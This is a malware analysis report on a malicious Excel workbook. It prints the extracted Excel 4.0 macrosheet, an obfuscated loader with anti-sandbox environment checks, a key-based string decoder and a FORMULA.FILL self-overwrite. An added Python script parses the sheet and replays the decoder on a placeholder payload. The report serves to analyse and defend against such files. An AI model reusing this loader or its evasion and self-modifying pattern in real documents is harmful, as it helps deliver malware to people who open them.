Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 794406d28d1b67c9…

MALICIOUS

Office (OOXML)

Size: 16.9 KB
Created: 2020-11-13 09:40:43 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-11-23
MD5: 4d552c7dc5178ae4f75543d8e4deca54
SHA-1: 68857f687b99266d1fa2502f69c6e4669cfdfb69
SHA-256: 794406d28d1b67c92060e6d091e9b48b7b107406b10c3d2457c0a7d5edcc9e30
Risk score: 182

Heuristics (4)

  • Excel 4.0 macro sheet (1 sheet) [critical] OOXML_XLM_MACROSHEET (2 related findings)
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet, here xl/macrosheets/sheet1.xml (carved below as xlm_sheet_00.xml). XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults; even legitimate XLM use is rare in modern workbooks, so a macrosheet part in a workbook from an untrusted sender is itself a strong signal.
  • Excel 4.0 Auto_Open defined name [critical] OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros: the defined name lives in xl/workbook.xml and points at the first macrosheet cell Excel runs on open, so nothing beyond enabling macros is needed from the user. The target cell of the name is not visible in the macrosheet preview below.
  • Dangerous XLM formula APIs: RETURN, HALT [critical] OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses functions from a watch list that covers the primitives which call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA) and are used to download payloads, write files, and start processes from an XLM macro without invoking VBA. The two functions matched in this sample, RETURN and HALT, are control-flow calls rather than Win32 calls, so the rule name overstates what was seen. The capability in this sheet comes from FORMULA.FILL (cell I160), which writes decoded formulas into other cells, and GET.WORKSPACE (cells I187, I189, I193), which gates execution on the environment. Whatever the decoded second stage does is not visible statically.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All nine URLs below were found in document text (OOXML body / shared strings). They are the XML namespace identifiers declared on the macrosheet's root element (visible as xmlns attributes in the preview under Extracted artifacts), not addresses the macro contacts, so they carry no value as network indicators.
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_sheet_00.xml
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet: xl/macrosheets/sheet1.xml
Size: 10574 bytes
SHA-256: 52a9f8ae25a8b74e55208806289227a5c8fcc8feb590c23773cd4b72de3ee5c9
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{8FC3D49C-8A43-4AAE-B73E-3B24754312FA}">
<dimension ref="I80:K217"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData>
<row r="80" spans="9:9" x14ac:dyDescent="0.25"><c r="I80" t="s"><v>0</v></c></row>
<row r="81" spans="9:11" x14ac:dyDescent="0.25"><c r="I81" t="s"><v>1</v></c></row>
<row r="82" spans="9:11" x14ac:dyDescent="0.25"><c r="I82" t="b"><f bx="1">cYQEBo=((PRODUCT((FALSE),((1))))+0)</f><v>0</v></c></row>
<row r="84" spans="9:11" x14ac:dyDescent="0.25"><c r="I84" t="b"><f bx="1">xfUfiZbKpM=cYQEBo</f><v>0</v></c></row>
<row r="85" spans="9:11" x14ac:dyDescent="0.25"><c r="I85" t="s"><v>2</v></c></row>
<row r="86" spans="9:11" x14ac:dyDescent="0.25"><c r="I86"><v>-403</v></c></row>
<row r="87" spans="9:11" x14ac:dyDescent="0.25"><c r="I87" t="s"><v>3</v></c></row>
<row r="89" spans="9:11" x14ac:dyDescent="0.25"><c r="I89" t="b"><f bx="1">NLjSfaW=cYQEBo</f><v>0</v></c><c r="K89"><v>100</v></c></row>
<row r="90" spans="9:11" x14ac:dyDescent="0.25"><c r="K90"><v>103</v></c></row>
<row r="91" spans="9:11" x14ac:dyDescent="0.25"><c r="I91"><v>644</v></c><c r="K91"><v>105</v></c></row>
<row r="92" spans="9:11" x14ac:dyDescent="0.25"><c r="K92"><v>122</v></c></row>
<row r="93" spans="9:11" x14ac:dyDescent="0.25"><c r="K93"><v>100</v></c></row>
<row r="94" spans="9:11" x14ac:dyDescent="0.25"><c r="I94" t="b"><f bx="1">IdUwiwrS=ROWS(evslvKcCjc&amp;"")</f><v>0</v></c><c r="K94"><v>102</v></c></row>
<row r="95" spans="9:11" x14ac:dyDescent="0.25"><c r="K95"><v>112</v></c></row>
<row r="96" spans="9:11" x14ac:dyDescent="0.25"><c r="K96"><v>96</v></c></row>
<row r="97" spans="9:11" x14ac:dyDescent="0.25"><c r="I97" t="s"><v>4</v></c><c r="K97"><v>111</v></c></row>
<row r="98" spans="9:11" x14ac:dyDescent="0.25"><c r="K98"><v>115</v></c></row>
<row r="99" spans="9:11" x14ac:dyDescent="0.25"><c r="I99" t="b"><f bx="1">PWlCheeSlRq=ROWS(CZUHFMbC&amp;"")</f><v>0</v></c></row>
<row r="101" spans="9:11" x14ac:dyDescent="0.25"><c r="I101"><v>-389</v></c></row>
<row r="103" spans="9:11" x14ac:dyDescent="0.25"><c r="I103" t="b"><f>WHILE(NOT(ABS(xfUfiZbKpM)&gt;=ABS(IdUwiwrS)))</f><v>0</v></c></row>
<row r="104" spans="9:11" x14ac:dyDescent="0.25"><c r="I104"><v>618</v></c></row>
<row r="105" spans="9:11" x14ac:dyDescent="0.25"><c r="I105"><v>-483</v></c></row>
<row r="106" spans="9:11" x14ac:dyDescent="0.25"><c r="I106" t="b"><f bx="1">zrLSimah=""</f><v>0</v></c></row>
<row r="109" spans="9:11" x14ac:dyDescent="0.25"><c r="I109"><v>900</v></c></row>
<row r="110" spans="9:11" x14ac:dyDescent="0.25"><c r="I110" t="b"><f bx="1">xfUfiZbKpM=xfUfiZbKpM+1</f><v>0</v></c></row>
<row r="112" spans="9:11" x14ac:dyDescent="0.25"><c r="I112" t="s"><v>5</v></c></row>
<row r="113" spans="9:9" x14ac:dyDescent="0.25"><c r="I113" t="b"><f bx="1">lwnEtYVFW=INDEX(evslvKcCjc,xfUfiZbKpM)</f><v>0</v></c></row>
<row r="114" spans="9:9" x14ac:dyDescent="0.25"><c r="I114"><v>-261</v></c></row>
<row r="115" spans="9:9" x14ac:dyDescent="0.25"><c r="I115" t="b"><f bx="1">NcVYeqxBAocv=LEN(lwnEtYVFW)</f><v>0</v></c></row>
<row r="117" spans="9:9" x14ac:dyDescent="0.25"><c r="I117" t="s"><v>6</v></c></row>
<row r="118" spans="9:9" x14ac:dyDescent="0.25"><c r="I118"><v>-273</v></c></row>
<row r="119" spans="9:9" x14ac:dyDescent="0.25"><c r="I119" t="b"><f bx="1">hVNYCtAfEtX=cYQEBo</f><v>0</v></c></row>
<row r="122" spans="9:9" x14ac:dyDescent="0.25"><c r="I122" t="s"><v>7</v></c></row>
<row r="123" spans="9:9" x14ac:dyDescent="0.25"><c r="I123" t="b"><f>WHILE(NOT(ABS(hVNYCtAfEtX)&gt;=ABS(NcVYeqxBAocv)))</f><v>0</v></c></row>
<row r="124" spans="9:9" x14ac:dyDescent="0.25"><c r="I124"><v>451</v></c></row>
<row r="126" spans="9:9" x14ac:dyDescent="0.25"><c r="I126"><v>301</v></c></row>
<row r="127" spans="9:9" x14ac:dyDescent="0.25"><c r="I127" t="b"><f bx="1">hVNYCtAfEtX=hVNYCtAfEtX+1</f><v>0</v></c></row>
<row r="128" spans="9:9" x14ac:dyDescent="0.25"><c r="I128" t="s"><v>8</v></c></row>
<row r="129" spans="9:9" x14ac:dyDescent="0.25"><c r="I129" t="b"><f bx="1">RUCnaWPqUQu=MID(lwnEtYVFW,hVNYCtAfEtX,1)</f><v>0</v></c></row>
<row r="131" spans="9:9" x14ac:dyDescent="0.25"><c r="I131" t="s"><v>9</v></c></row>
<row r="133" spans="9:9" x14ac:dyDescent="0.25"><c r="I133" t="s"><v>10</v></c></row>
<row r="134" spans="9:9" x14ac:dyDescent="0.25"><c r="I134" t="b"><f bx="1">iCPWnF=CODE(RUCnaWPqUQu)</f><v>0</v></c></row>
<row r="136" spans="9:9" x14ac:dyDescent="0.25"><c r="I136"><v>-608</v></c></row>
<row r="137" spans="9:9" x14ac:dyDescent="0.25"><c r="I137"><v>475</v></c></row>
<row r="138" spans="9:9" x14ac:dyDescent="0.25"><c r="I138" t="b"><f bx="1">ZzHsdW=MOD(NLjSfaW,PWlCheeSlRq)+1</f><v>0</v></c></row>
<row r="139" spans="9:9" x14ac:dyDescent="0.25"><c r="I139" t="s"><v>11</v></c></row>
<row r="141" spans="9:9" x14ac:dyDescent="0.25"><c r="I141" t="b"><f bx="1">VbkccSvg=INDEX(CZUHFMbC,ZzHsdW)</f><v>0</v></c></row>
<row r="143" spans="9:9" x14ac:dyDescent="0.25"><c r="I143" t="b"><f bx="1">JSJIZbcTzcd=T(CHAR(INT(ROUNDUP(iCPWnF,0)-ROUNDUP(VbkccSvg,0))))</f><v>0</v></c></row>
<row r="146" spans="9:9" x14ac:dyDescent="0.25"><c r="I146" t="b"><f bx="1">zrLSimah=zrLSimah&amp;JSJIZbcTzcd</f><v>0</v></c></row>
<row r="149" spans="9:9" x14ac:dyDescent="0.25"><c r="I149" t="s"><v>12</v></c></row>
<row r="150" spans="9:9" x14ac:dyDescent="0.25"><c r="I150" t="b"><f bx="1">NLjSfaW=NLjSfaW+1</f><v>0</v></c></row>
<row r="151" spans="9:9" x14ac:dyDescent="0.25"><c r="I151" t="s"><v>13</v></c></row>
<row r="152" spans="9:9" x14ac:dyDescent="0.25"><c r="I152" t="b"><f>NEXT()</f><v>0</v></c></row>
<row r="154" spans="9:9" x14ac:dyDescent="0.25"><c r="I154"><v>-330</v></c></row>
<row r="155" spans="9:9" x14ac:dyDescent="0.25"><c r="I155" t="b"><f bx="1">ePIegKQn=ADDRESS(nDRSvHzIYC,PuOjl,,FALSE,"QrSjqJsOmk")</f><v>0</v></c></row>
<row r="156" spans="9:9" x14ac:dyDescent="0.25"><c r="I156"><v>128</v></c></row>
<row r="157" spans="9:9" x14ac:dyDescent="0.25"><c r="I157" t="s"><v>14</v></c></row>
<row r="160" spans="9:9" x14ac:dyDescent="0.25"><c r="I160" t="e"><f>INT(T(FORMULA.FILL(T(zrLSimah)&amp;"",""&amp;T(ePIegKQn))))</f><v>#VALUE!</v></c></row>
<row r="161" spans="9:9" x14ac:dyDescent="0.25"><c r="I161"><v>-705</v></c></row>
<row r="162" spans="9:9" x14ac:dyDescent="0.25"><c r="I162"><v>-620</v></c></row>
<row r="163" spans="9:9" x14ac:dyDescent="0.25"><c r="I163" t="b"><f bx="1">nDRSvHzIYC=nDRSvHzIYC+1</f><v>0</v></c></row>
<row r="165" spans="9:9" x14ac:dyDescent="0.25"><c r="I165"><v>-805</v></c></row>
<row r="166" spans="9:9" x14ac:dyDescent="0.25"><c r="I166" t="b"><f>NEXT()</f><v>0</v></c></row>
<row r="168" spans="9:9" x14ac:dyDescent="0.25"><c r="I168"><v>287</v></c></row>
<row r="169" spans="9:9" x14ac:dyDescent="0.25"><c r="I169"><v>100</v></c></row>
<row r="170" spans="9:9" x14ac:dyDescent="0.25"><c r="I170" t="b"><f>RETURN()</f><v>0</v></c></row>
<row r="171" spans="9:9" x14ac:dyDescent="0.25"><c r="I171"><v>688</v></c></row>
<row r="172" spans="9:9" x14ac:dyDescent="0.25"><c r="I172" t="s"><v>15</v></c></row>
<row r="173" spans="9:9" x14ac:dyDescent="0.25"><c r="I173"><v>986</v></c></row>
<row r="174" spans="9:9" x14ac:dyDescent="0.25"><c r="I174"><v>843</v></c></row>
<row r="176" spans="9:9" x14ac:dyDescent="0.25"><c r="I176"><v>887</v></c></row>
<row r="177" spans="9:9" x14ac:dyDescent="0.25"><c r="I177" t="s"><v>16</v></c></row>
<row r="180" spans="9:9" x14ac:dyDescent="0.25"><c r="I180"><v>51</v></c></row>
<row r="183" spans="9:9" x14ac:dyDescent="0.25"><c r="I183" t="s"><v>17</v></c></row>
<row r="184" spans="9:9" x14ac:dyDescent="0.25"><c r="I184" t="s"><v>18</v></c></row>
<row r="187" spans="9:9" x14ac:dyDescent="0.25"><c r="I187" t="b"><f bx="1">vHetihttDYnW=GET.WORKSPACE(VALUE("42"))</f><v>0</v></c></row>
<row r="189" spans="9:9" x14ac:dyDescent="0.25"><c r="I189" t="b"><f bx="1">LzRRTKDzj=NOT(GET.WORKSPACE(VALUE("31")))</f><v>0</v></c></row>
<row r="191" spans="9:9" x14ac:dyDescent="0.25"><c r="I191" t="s"><v>19</v></c></row>
<row r="192" spans="9:9" x14ac:dyDescent="0.25"><c r="I192"><v>560</v></c></row>
<row r="193" spans="9:9" x14ac:dyDescent="0.25"><c r="I193" t="b"><f bx="1">SPVjXXCKc=GET.WORKSPACE(VALUE("19"))</f><v>0</v></c></row>
<row r="196" spans="9:9" x14ac:dyDescent="0.25"><c r="I196" t="e"><f>IF(AND(vHetihttDYnW,LzRRTKDzj,SPVjXXCKc),,HALT())</f><v>#NAME?</v></c></row>
<row r="197" spans="9:9" x14ac:dyDescent="0.25"><c r="I197" t="s"><v>20</v></c></row>
<row r="198" spans="9:9" x14ac:dyDescent="0.25"><c r="I198" t="s"><v>21</v></c></row>
<row r="199" spans="9:9" x14ac:dyDescent="0.25"><c r="I199" t="b"><f bx="1">zYVFOeetCLtr=$I$82</f><v>0</v></c></row>
<row r="200" spans="9:9" x14ac:dyDescent="0.25"><c r="I200"><v>-348</v></c></row>
<row r="203" spans="9:9" x14ac:dyDescent="0.25"><c r="I203" t="b"><f bx="1">evslvKcCjc=Sheet1!$B$81:$B$133</f><v>0</v></c></row>
<row r="205" spans="9:9" x14ac:dyDescent="0.25"><c r="I205" t="s"><v>22</v></c></row>
<row r="207" spans="9:9" x14ac:dyDescent="0.25"><c r="I207" t="b"><f bx="1">CZUHFMbC=$K$89:$K$98</f><v>0</v></c></row>
<row r="208" spans="9:9" x14ac:dyDescent="0.25"><c r="I208" t="s"><v>23</v></c></row>
<row r="209" spans="9:9" x14ac:dyDescent="0.25"><c r="I209"><v>643</v></c></row>
<row r="211" spans="9:9" x14ac:dyDescent="0.25"><c r="I211" t="b"><f bx="1">nDRSvHzIYC=217</f><v>0</v></c></row>
<row r="212" spans="9:9" x14ac:dyDescent="0.25"><c r="I212" t="s"><v>24</v></c></row>
<row r="213" spans="9:9" x14ac:dyDescent="0.25"><c r="I213" t="b"><f bx="1">PuOjl=9</f><v>0</v></c></row>
<row r="216" spans="9:9" x14ac:dyDescent="0.25"><c r="I216" t="e"><f>zYVFOeetCLtr()</f><v>#NAME?</v></c></row>
<row r="217" spans="9:9" x14ac:dyDescent="0.25"><c r="I217" t="b"><f>HALT()</f><v>0</v></c></row>
</sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
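Read in execution order, the extracted sheet shows this flow. I187 to I196 query GET.WORKSPACE(42) (machine can play sounds), NOT(GET.WORKSPACE(31)) (the macro is not being single-stepped in a debugger) and GET.WORKSPACE(19) (a mouse is present) and HALT() unless all three hold, a standard check against sandboxes and analysts. I199 to I213 set the decoder's inputs: the routine address $I$82, the ciphertext range Sheet1!$B$81:$B$133, the key range $K$89:$K$98 (100, 103, 105, 122, 100, 102, 112, 96, 111, 115), start row 217 and column 9. I216 calls the routine at $I$82, which walks each ciphertext string, subtracts the cycling key byte from every character code (CHAR(CODE(c) - key), with one running counter NLjSfaW across all strings and key index MOD(NLjSfaW, 10) + 1), and writes each decoded string as a formula with FORMULA.FILL into ADDRESS(row, 9,, FALSE, "QrSjqJsOmk"), i.e. R217C9 and the rows below it. RETURN() then lands back at I216 and execution falls into I217, whose HALT() has by then been overwritten by the first decoded formula. For that to work the sheet named QrSjqJsOmk has to be this macrosheet itself; sheet names live in xl/workbook.xml, which the preview does not show, so that is an inference. The ciphertext in Sheet1 and the Auto_Open target are also outside the preview, so the second stage cannot be recovered from this page.

The script below is an added example, not code from the report or from any analysis tool. It parses a constructed, abridged macrosheet whose formulas are copied from the preview, flags the environment checks and the FORMULA.FILL write, and replays the decoder against a constructed placeholder payload encoded with the sheet's key. The GET.WORKSPACE type meanings follow the Excel 4.0 macro function reference; the placeholder payload, the sheet-name assumption and the treatment of CODE()/CHAR() as Unicode code points (Excel uses the ANSI code page) are assumptions of the example.

```python
"""Added example, not part of the original report: parse an OOXML XLM
macrosheet, list formulas in cell order, flag environment checks and
cell-writing primitives, and replay the sheet's subtractive decoder."""
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# GET.WORKSPACE() type numbers queried by this sample.
WORKSPACE_CHECKS = {
    19: "mouse present",
    31: "macro running in single-step (debugger) mode",
    42: "machine can play sounds",
}

# $K$89:$K$98 of the extracted sheet, read by the decoder as CZUHFMbC.
KEY = [100, 103, 105, 122, 100, 102, 112, 96, 111, 115]

# Constructed, abridged macrosheet with the same cell shapes as the real
# one: formula cells (t="b" plus <f>), shared-string indexes (t="s") and
# numeric junk. The formulas are copied verbatim from the preview.
SAMPLE_XML = """<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>
<row r="82"><c r="I82" t="b"><f bx="1">cYQEBo=((PRODUCT((FALSE),((1))))+0)</f><v>0</v></c></row>
<row r="85"><c r="I85" t="s"><v>2</v></c></row>
<row r="86"><c r="I86"><v>-403</v></c></row>
<row r="160"><c r="I160" t="e"><f>INT(T(FORMULA.FILL(T(zrLSimah)&amp;"",""&amp;T(ePIegKQn))))</f><v>#VALUE!</v></c></row>
<row r="187"><c r="I187" t="b"><f bx="1">vHetihttDYnW=GET.WORKSPACE(VALUE("42"))</f><v>0</v></c></row>
<row r="189"><c r="I189" t="b"><f bx="1">LzRRTKDzj=NOT(GET.WORKSPACE(VALUE("31")))</f><v>0</v></c></row>
<row r="193"><c r="I193" t="b"><f bx="1">SPVjXXCKc=GET.WORKSPACE(VALUE("19"))</f><v>0</v></c></row>
<row r="196"><c r="I196" t="e"><f>IF(AND(vHetihttDYnW,LzRRTKDzj,SPVjXXCKc),,HALT())</f><v>#NAME?</v></c></row>
<row r="217"><c r="I217" t="b"><f>HALT()</f><v>0</v></c></row>
</sheetData></xm:macrosheet>"""


def extract_formulas(xml_text):
    """Return [(cell_ref, formula)] in sheet order; cells without <f>
    (shared-string indexes, numeric padding) are skipped."""
    root = ET.fromstring(xml_text)
    found = []
    for cell in root.iterfind(".//m:sheetData/m:row/m:c", NS):
        f = cell.find("m:f", NS)
        if f is not None and f.text:
            found.append((cell.get("r"), f.text))
    return found


def triage(formulas):
    """Label the primitives worth a second look. Returns [(cell_ref, label)]."""
    labels = []
    for ref, text in formulas:
        for num in re.findall(r'GET\.WORKSPACE\(VALUE\("(\d+)"\)\)', text):
            meaning = WORKSPACE_CHECKS.get(int(num), "unknown type")
            labels.append((ref, f"GET.WORKSPACE({num}): {meaning}"))
        if "FORMULA.FILL(" in text or "FORMULA(" in text:
            labels.append((ref, "writes a formula into another cell"))
        if re.search(r"\bHALT\(\)", text):
            labels.append((ref, "HALT(): execution stops here"))
    return labels


def xlm_decode(cipher_rows, key=KEY):
    """Replay the nested WHILE loops: one running counter (NLjSfaW) across
    all rows picks the key byte; each output char is CHAR(CODE(c) - key).
    Codes are Unicode code points here (assumption; Excel uses ANSI)."""
    counter = 0
    decoded = []
    for row in cipher_rows:                # INDEX(evslvKcCjc, xfUfiZbKpM)
        out = []                           # zrLSimah = ""
        for ch in row:                     # MID(lwnEtYVFW, hVNYCtAfEtX, 1)
            k = key[counter % len(key)]    # INDEX(CZUHFMbC, MOD(NLjSfaW, 10) + 1)
            out.append(chr(ord(ch) - k))   # CHAR(CODE(ch) - k)
            counter += 1                   # NLjSfaW = NLjSfaW + 1
        decoded.append("".join(out))
    return decoded


def xlm_encode(plain_rows, key=KEY):
    """Inverse of xlm_decode; only used to build constructed test input."""
    counter = 0
    rows = []
    for row in plain_rows:
        out = []
        for ch in row:
            out.append(chr(ord(ch) + key[counter % len(key)]))
            counter += 1
        rows.append("".join(out))
    return rows


def fill_targets(count, row=217, col=9, sheet="QrSjqJsOmk"):
    """Cells FORMULA.FILL writes to: ADDRESS(nDRSvHzIYC, PuOjl,, FALSE,
    "QrSjqJsOmk") in R1C1 form, row incremented once per decoded string,
    so output lands at R217C9 (I217) and the rows below it."""
    return [f"{sheet}!R{row + i}C{col}" for i in range(count)]


if __name__ == "__main__":
    for ref, label in triage(extract_formulas(SAMPLE_XML)):
        print(f"{ref:>5}  {label}")
    # Constructed placeholder payload; the real ciphertext in
    # Sheet1!$B$81:$B$133 is not in the preview.
    plain = ['=ALERT("constructed placeholder")', "=HALT()"]
    cipher = xlm_encode(plain)
    for target, text in zip(fill_targets(len(cipher)), xlm_decode(cipher)):
        print(f"FORMULA.FILL -> {target}: {text}")
```

To run it against the real artifact, replace SAMPLE_XML with the contents of xlm_sheet_00.xml; extract_formulas and triage need no change. xlm_decode only becomes useful once Sheet1's B81:B133 strings are pulled from xl/worksheets/sheet1.xml and xl/sharedStrings.xml, neither of which this page carries.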